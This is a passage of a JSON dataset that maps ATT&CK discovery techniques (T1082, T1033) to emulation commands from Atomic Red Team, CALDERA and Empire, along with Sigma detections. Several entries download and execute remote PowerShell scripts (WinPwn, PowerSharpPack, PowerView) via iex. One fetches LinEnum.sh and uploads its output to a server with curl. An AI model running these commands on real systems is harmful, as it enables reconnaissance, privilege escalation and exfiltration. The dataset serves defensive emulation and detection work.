"data/abilities/discovery/46098c66-8d9a-4d23-8a95-dd5021c385ae.yml", + "name": "Download and execute LinEnum.sh" + }, + { + "command": "[environment]::OSVersion.Version\n", + "source": "data/abilities/discovery/b6b105b9-41dc-490b-bc5c-80d699b82ce8.yml", + "name": "Find OS Version" + }, + { + "command": "powershell/situational_awareness/host/computerdetails", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/host/winenum", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_computer", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1082", + "Built-in Windows 
Command": "ver", + "Cobalt Strike": "shell ver", + "Metasploit": "", + "Description": "Get the Windows OS version that's running" + }, + { + "Category": "T1082", + "Built-in Windows Command": "set", + "Cobalt Strike": "shell set", + "Metasploit": "get_env.rb", + "Description": "Print all of the environment variables" + }, + { + "Category": "T1082", + "Built-in Windows Command": "net config workstation\nnet config server", + "Cobalt Strike": "shell net config workstation\nshell net config server", + "Metasploit": "", + "Description": "Get computer name, username, OS software version, domain information, DNS, logon domain" + }, + { + "Category": "T1082", + "Built-in Windows Command": "systeminfo [/s COMPNAME] [/u DOMAIN\\user] [/p password]", + "Cobalt Strike": "systemprofiler tool if no access yet (victim browses to website)\nor\nshell systeminfo (if you already have a beacon)", + "Metasploit": "sysinfo, run winenum, get_env.rb", + "Description": "Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties, such as RAM, disk space, and network cards" + }, + { + "attack_technique": "T1082", + "display_name": "System Information Discovery", + "atomic_tests": [ + { + "name": "System Information Discovery", + "auto_generated_guid": "66703791-c902-4560-8770-42b8a91f7667", + "description": "Identify System Info. 
Upon execution, system info and time info will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "systeminfo\nreg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum\n", + "name": "command_prompt" + } + }, + { + "name": "System Information Discovery", + "auto_generated_guid": "edff98ec-0f73-4f63-9890-6b117092aff6", + "description": "Identify System Info\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "system_profiler\nls -al /Applications\n", + "name": "sh" + } + }, + { + "name": "List OS Information", + "auto_generated_guid": "cccb070c-df86-4216-a5bc-9fb60c74e27c", + "description": "Identify System Info\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "output_file": { + "description": "Output file used to store the results.", + "type": "Path", + "default": "/tmp/T1082.txt" + } + }, + "executor": { + "command": "uname -a >> #{output_file}\nif [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi;\nif [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi; \nif [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi;\nuptime >> #{output_file}\ncat #{output_file} 2>/dev/null\n", + "cleanup_command": "rm #{output_file} 2>/dev/null\n", + "name": "sh" + } + }, + { + "name": "Linux VM Check via Hardware", + "auto_generated_guid": "31dad7ad-2286-4c02-ae92-274418c85fec", + "description": "Identify virtual machine hardware. 
This technique is used by the Pupy RAT and other malware.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi;\nif [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i \"Droplet\\|HVM\\|VirtualBox\\|VMware\"; fi;\nif [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i \"Xen\\|Bochs\\|QEMU\"; fi;\nif [ -x \"$(command -v dmidecode)\" ]; then sudo dmidecode | grep -i \"microsoft\\|vmware\\|virtualbox\\|quemu\\|domu\"; fi;\nif [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i \"vmware\\|vbox\"; fi;\nif [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i \"vmware\\|vbox\\|qemu\\|virtual\"; fi;\nif [ -x \"$(command -v lspci)\" ]; then sudo lspci | grep -i \"vmware\\|virtualbox\"; fi;\nif [ -x \"$(command -v lscpu)\" ]; then sudo lscpu | grep -i \"Xen\\|KVM\\|Microsoft\"; fi;\n", + "name": "bash" + } + }, + { + "name": "Linux VM Check via Kernel Modules", + "auto_generated_guid": "8057d484-0fae-49a4-8302-4812c4f1e64e", + "description": "Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "sudo lsmod | grep -i \"vboxsf\\|vboxguest\"\nsudo lsmod | grep -i \"vmw_baloon\\|vmxnet\"\nsudo lsmod | grep -i \"xen-vbd\\|xen-vnif\"\nsudo lsmod | grep -i \"virtio_pci\\|virtio_net\"\nsudo lsmod | grep -i \"hv_vmbus\\|hv_blkvsc\\|hv_netvsc\\|hv_utils\\|hv_storvsc\"\n", + "name": "bash" + } + }, + { + "name": "Hostname Discovery (Windows)", + "auto_generated_guid": "85cfbf23-4a1e-4342-8792-007e004b975f", + "description": "Identify system hostname for Windows. 
Upon execution, the hostname of the device will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "hostname\n", + "name": "command_prompt" + } + }, + { + "name": "Hostname Discovery", + "auto_generated_guid": "486e88ea-4f56-470f-9b57-3f4d73f39133", + "description": "Identify system hostname for Linux and macOS systems.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "hostname\n", + "name": "bash" + } + }, + { + "name": "Windows MachineGUID Discovery", + "auto_generated_guid": "224b4daf-db44-404e-b6b2-f4d1f0126ef8", + "description": "Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "REG QUERY HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography /v MachineGuid\n", + "name": "command_prompt" + } + }, + { + "name": "Griffon Recon", + "auto_generated_guid": "69bd4abe-8759-49a6-8d21-0f15822d6370", + "description": "This script emulates the reconnaissance script seen in used by Griffon and was modified by security researcher Kirk Sayre \nin order simply print the recon results to the screen as opposed to exfiltrating them. [Script](https://gist.github.com/kirk-sayre-work/7cb5bf4e2c7c77fa5684ddc17053f1e5). 
\nFor more information see also [https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon](https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon) and [https://attack.mitre.org/software/S0417/](https://attack.mitre.org/software/S0417/)", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "vbscript": { + "description": "Path to sample script", + "type": "String", + "default": "PathToAtomicsFolder\\T1082\\src\\griffon_recon.vbs" + } + }, + "executor": { + "command": "cscript #{vbscript}", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Environment variables discovery on windows", + "auto_generated_guid": "f400d1c0-1804-4ff8-b069-ef5ddd2adbf3", + "description": "Identify all environment variables. Upon execution, environments variables and your path info will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "set\n", + "name": "command_prompt" + } + }, + { + "name": "Environment variables discovery on macos and linux", + "auto_generated_guid": "fcbdd43f-f4ad-42d5-98f3-0218097e2720", + "description": "Identify all environment variables. Upon execution, environments variables and your path info will be displayed.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "command": "env\n", + "name": "sh" + } + }, + { + "name": "Show System Integrity Protection status (MacOS)", + "auto_generated_guid": "327cc050-9e99-4c8e-99b5-1d15f2fb6b96", + "description": "Read and Display System Intergrety Protection status. 
csrutil is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not.\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "csrutil status\n", + "name": "sh" + } + }, + { + "name": "WinPwn - winPEAS", + "auto_generated_guid": "eea1d918-825e-47dd-acc2-814d6c58c0e1", + "description": "Discover Local Privilege Escalation possibilities using winPEAS function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwinPEAS -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - itm4nprivesc", + "auto_generated_guid": "3d256a2f-5e57-4003-8eb6-64d91b1da7ce", + "description": "Discover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nitm4nprivesc -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - Powersploits privesc checks", + "auto_generated_guid": "345cb8e4-d2de-4011-a580-619cf5a9e2d7", + "description": "Powersploits privesc checks using oldchecks function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\noldchecks -noninteractive -consoleoutput", + 
"cleanup_command": "rm -force -recurse .\\DomainRecon -ErrorAction Ignore\nrm -force -recurse .\\Exploitation -ErrorAction Ignore\nrm -force -recurse .\\LocalPrivEsc -ErrorAction Ignore\nrm -force -recurse .\\LocalRecon -ErrorAction Ignore\nrm -force -recurse .\\Vulnerabilities -ErrorAction Ignore", + "name": "powershell" + } + }, + { + "name": "WinPwn - General privesc checks", + "auto_generated_guid": "5b6f39a2-6ec7-4783-a5fd-2c54a55409ed", + "description": "General privesc checks using the otherchecks function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\notherchecks -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - GeneralRecon", + "auto_generated_guid": "7804659b-fdbf-4cf6-b06a-c03e758590e8", + "description": "Collect general computer informations via GeneralRecon function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGeneralrecon -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "WinPwn - Morerecon", + "auto_generated_guid": "3278b2f6-f733-4875-9ef4-bfed34244f0a", + "description": "Gathers local system information using the Morerecon function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nMorerecon 
-noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - RBCD-Check", + "auto_generated_guid": "dec6a0d8-bcaf-4c22-9d48-2aee59fb692b", + "description": "Search for Resource-Based Constrained Delegation attack paths using RBCD-Check function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nRBCD-Check -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "WinPwn - PowerSharpPack - Watson searching for missing windows patches", + "auto_generated_guid": "07b18a66-6304-47d2-bad0-ef421eb2e107", + "description": "PowerSharpPack - Watson searching for missing windows patches technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')\nInvoke-watson", + "name": "powershell" + } + }, + { + "name": "WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors", + "auto_generated_guid": "efb79454-1101-4224-a4d0-30c9c8b29ffc", + "description": "PowerSharpPack - Sharpup checking common Privesc vectors technique via function of WinPwn - Takes several minutes to complete.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')\nInvoke-SharpUp -command \"audit\"", + "name": "powershell" + } + }, + { + "name": "WinPwn - PowerSharpPack - Seatbelt", + "auto_generated_guid": "5c16ceb4-ba3a-43d7-b848-a13c1f216d95", + "description": "PowerSharpPack - Seatbelt technique via function of 
WinPwn.\n\n[Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey \"safety checks\" relevant from both offensive and defensive security perspectives.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')\nInvoke-Seatbelt -Command \"-group=all\"; pause", + "name": "powershell" + } + } + ] + }, + { + "id": "29451844-9b76-4e16-a9ee-d6feab4b24db", + "name": "PowerShell version", + "description": "Discover the PowerShell version", + "tactic": "discovery", + "technique": { + "attack_id": "T1082", + "name": "System Information Discovery" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": "$PSVersionTable\n" + } + } + } + }, + { + "id": "30732a56-4a23-4307-9544-09caf2ed29d5", + "name": "Find deletable dirs (per user)", + "description": "Discover all directories containing deletable files by user", + "tactic": "discovery", + "technique": { + "attack_id": "T1082", + "name": "System Information Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "find / -type d -user #{host.user.name} \\( -perm -g+w -or -perm -o+w \\) 2>/dev/null -exec ls -adl {} \\;\n" + } + }, + "linux": { + "sh": { + "command": "find / -type d -user #{host.user.name} \\( -perm -g+w -or -perm -o+w \\) 2>/dev/null -exec ls -adl {} \\;\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.user.name" + } + ] + } + ] + }, + { + "id": "46098c66-8d9a-4d23-8a95-dd5021c385ae", + "name": "Linux Enumeration & Privilege Escalation Discovery Script", + "description": "Download and execute LinEnum.sh", + "tactic": "discovery", + "technique": { + "attack_id": "T1082", + "name": "System Information Discovery" + }, + "platforms": { + "linux": { + "sh": { + "command": "wget 
https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh;\nchmod +x LinEnum.sh;\n./LinEnum.sh > /tmp/exfil.txt;\ncurl -F 'data=@/tmp/exfil.txt' #{server}/file/upload ;\ncat /tmp/exfil.txt;\n", + "cleanup": "rm ./LinEnum.sh;\nrm /tmp/exfil.txt;\n" + } + } + } + }, + { + "id": "b6b105b9-41dc-490b-bc5c-80d699b82ce8", + "name": "Find OS Version", + "description": "Find OS Version", + "tactic": "discovery", + "technique": { + "attack_id": "T1082", + "name": "System Information Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "[environment]::OSVersion.Version\n" + } + } + } + }, + { + "Empire Module": "powershell/situational_awareness/host/computerdetails", + "ATT&CK Technique #1": "T1082", + "ATT&CK Technique #2": "T1005", + "Technique": "System Information Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/computerdetails\": [\"T1082\",\"T1005\"]," + }, + { + "Empire Module": "powershell/situational_awareness/host/winenum", + "ATT&CK Technique #1": "T1082", + "ATT&CK Technique #2": "", + "Technique": "System Information Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/winenum\": [\"T1082\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_computer", + "ATT&CK Technique #1": "T1082", + "ATT&CK Technique #2": "", + "Technique": "System Information Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_computer\": [\"T1082\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains\"sysinfo.exe\"or process_path contains \"reg.exe\")and process_command_line contains \"reg*query HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\Disk\\\\Enum\"", + "name": "System Information Discovery" + } + ], + "possible_detections": [ + { + "title": "Reconnaissance Activity with Net Command", + "id": 
"2887e914-ce96-435f-8105-593937e90757", + "status": "experimental", + "description": "Detects a set of commands often used in recon stages by different attack groups", + "references": [ + "https://twitter.com/haroonmeer/status/939099379834658817", + "https://twitter.com/c_APT_ure/status/939475433711722497", + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html" + ], + "author": "Florian Roth, Markus Neis", + "date": "2018/08/22", + "modified": "2018/12/11", + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "tasklist", + "net time", + "systeminfo", + "whoami", + "nbtstat", + "net start", + "*\\net1 start", + "qprocess", + "nslookup", + "hostname.exe", + "*\\net1 user /domain", + "*\\net1 group /domain", + "*\\net1 group \"domain admins\" /domain", + "*\\net1 group \"Exchange Trusted Subsystem\" /domain", + "*\\net1 accounts /domain", + "*\\net1 user net localgroup administrators", + "netstat -an" + ] + }, + "timeframe": "15s", + "condition": "selection | count() by CommandLine > 4" + }, + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "level": "medium" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance metadata", + "description": "Data and information that describe an instance and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "instance" + }, + { + "data_source": 
"process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or 
script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + 
"http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + 
"https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://securelist.com/muddywater/88059/", + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1033", + "command_list": [ + "whoami /all /fo list", + "shell whoami /all /fo list", + "getuid", + "cmd.exe /C whoami\nwmic useraccount get /ALL\nquser /SERVER:\"localhost\"\nquser\nqwinsta.exe /server:localhost\nqwinsta.exe\nfor /F \"tokens=1,2\" %i in ('qwinsta /server:localhost ^| findstr \"Active Disc\"') do @echo %i | find /v \"#\" | find /v \"console\" || echo %j > computers.txt\n@FOR /F %n in (computers.txt) DO @FOR /F \"tokens=1,2\" %i in ('qwinsta /server:%n ^| findstr \"Active Disc\"') do @echo %i | find /v \"#\" | find /v \"console\" || echo %j > usernames.txt\n", + "users\nw\nwho\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose\n", + "[System.Environment]::UserName | Out-File -FilePath .\\CurrentactiveUser.txt \n$env:UserName | Out-File -FilePath .\\CurrentactiveUser.txt -Append\n", + 
"[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\\CurrentUserObject.txt\n", + "Import-Module .\\powerview.ps1 -Force;\nGet-NetUser -AdminCount | ConvertTo-Json -Depth 1\n", + "whoami\n", + "whoami", + "$env:username\n", + "echo %username%", + "Import-Module .\\powerview.ps1 -Force;\nGet-NetUser -SPN | ConvertTo-Json -Depth 1\n", + "powershell/situational_awareness/network/bloodhound", + "powershell/situational_awareness/network/powerview/get_session" + ], + "commands": [ + { + "command": "whoami /all /fo list", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell whoami /all /fo list", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "getuid", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "cmd.exe /C whoami\nwmic useraccount get /ALL\nquser /SERVER:\"localhost\"\nquser\nqwinsta.exe /server:localhost\nqwinsta.exe\nfor /F \"tokens=1,2\" %i in ('qwinsta /server:localhost ^| findstr \"Active Disc\"') do @echo %i | find /v \"#\" | find /v \"console\" || echo %j > computers.txt\n@FOR /F %n in (computers.txt) DO @FOR /F \"tokens=1,2\" %i in ('qwinsta /server:%n ^| findstr \"Active Disc\"') do @echo %i | find /v \"#\" | find /v \"console\" || echo %j > usernames.txt\n", + "source": "atomics/T1033/T1033.yaml", + "name": "Atomic Red Team Test - System Owner/User Discovery" + }, + { + "command": "users\nw\nwho\n", + "source": "atomics/T1033/T1033.yaml", + "name": "Atomic Red Team Test - System Owner/User Discovery" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); 
Invoke-UserHunter -Stealth -Verbose\n", + "source": "atomics/T1033/T1033.yaml", + "name": "Atomic Red Team Test - System Owner/User Discovery" + }, + { + "command": "[System.Environment]::UserName | Out-File -FilePath .\\CurrentactiveUser.txt \n$env:UserName | Out-File -FilePath .\\CurrentactiveUser.txt -Append\n", + "source": "atomics/T1033/T1033.yaml", + "name": "Atomic Red Team Test - System Owner/User Discovery" + }, + { + "command": "[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\\CurrentUserObject.txt\n", + "source": "atomics/T1033/T1033.yaml", + "name": "Atomic Red Team Test - System Owner/User Discovery" + }, + { + "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetUser -AdminCount | ConvertTo-Json -Depth 1\n", + "source": "data/abilities/discovery/aaf34d82-aea9-4278-8ec4-789653e4f5d9.yml", + "name": "Get Administrator users for a computer" + }, + { + "command": "whoami\n", + "source": "data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml", + "name": "Obtain user from current session" + }, + { + "command": "whoami", + "source": "data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml", + "name": "Find user running agent" + }, + { + "command": "$env:username\n", + "source": "data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml", + "name": "Find user running agent" + }, + { + "command": "echo %username%", + "source": "data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml", + "name": "Find user running agent" + }, + { + "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetUser -SPN | ConvertTo-Json -Depth 1\n", + "source": "data/abilities/discovery/f1cf4ea1-43f0-4604-9537-3d1b1b2d5b1c.yml", + "name": "Get Service Accounts for a domain" + }, + { + "command": "powershell/situational_awareness/network/bloodhound", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": 
